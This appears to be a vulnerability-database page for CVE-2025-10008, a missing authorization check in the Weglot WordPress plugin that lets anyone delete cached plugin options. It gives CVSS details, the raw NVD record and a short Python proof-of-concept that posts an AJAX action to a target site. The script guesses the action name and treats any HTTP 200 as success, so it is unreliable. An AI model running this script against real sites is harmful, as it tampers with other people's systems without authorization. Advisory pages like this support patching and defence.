Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-10008 CVSS 5.3 MEDIUM

CVE-2025-10008

Published: 2025-10-30 06:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Translate WordPress and go Multilingual – Weglot plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'clean_options' function in all versions up to, and including, 5.1. This makes it possible for unauthenticated attackers to delete limited transients that contain cached plugin options.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Weglot plugin <= 5.1 (all versions up to and including 5.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-10008 PoC - Weglot Plugin Unauthorized Transient Deletion # Target: WordPress site with Weglot plugin <= 5.1 def exploit_weglot(target_url): """ Exploit for CVE-2025-10008 Missing capability check on clean_options function Allows unauthenticated deletion of plugin transients """ # Prepare the exploit payload # The clean_options function is typically hooked to an AJAX action exploit_data = { 'action': 'weglot_clean_options', # AJAX action hook 'nonce': '' # Nonce not required due to missing capability check } # Try common AJAX endpoints endpoints = [ f'{target_url}/wp-admin/admin-ajax.php', f'{target_url}/wp-admin/admin-post.php' ] for endpoint in endpoints: try: response = requests.post(endpoint, data=exploit_data, timeout=10) if response.status_code == 200: print(f'[+] Successfully sent exploit to {endpoint}') print(f'[+] Response: {response.text[:200]}') return True except requests.RequestException as e: print(f'[-] Request failed: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve_2025_10008.py <target_url>') print('Example: python cve_2025_10008.py http://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') print(f'[*] Targeting: {target}') print(f'[*] Exploiting CVE-2025-10008...') exploit_weglot(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10008", "sourceIdentifier": "[email protected]", "published": "2025-10-30T06:15:42.690", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Translate WordPress and go Multilingual – Weglot plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'clean_options' function in all versions up to, and including, 5.1. This makes it possible for unauthenticated attackers to delete limited transients that contain cached plugin options."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/weglot/trunk/src/actions/front/class-clean-options.php#L33", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3383165/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb2a8a6f-fe97-4588-a084-64f502a40c51?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.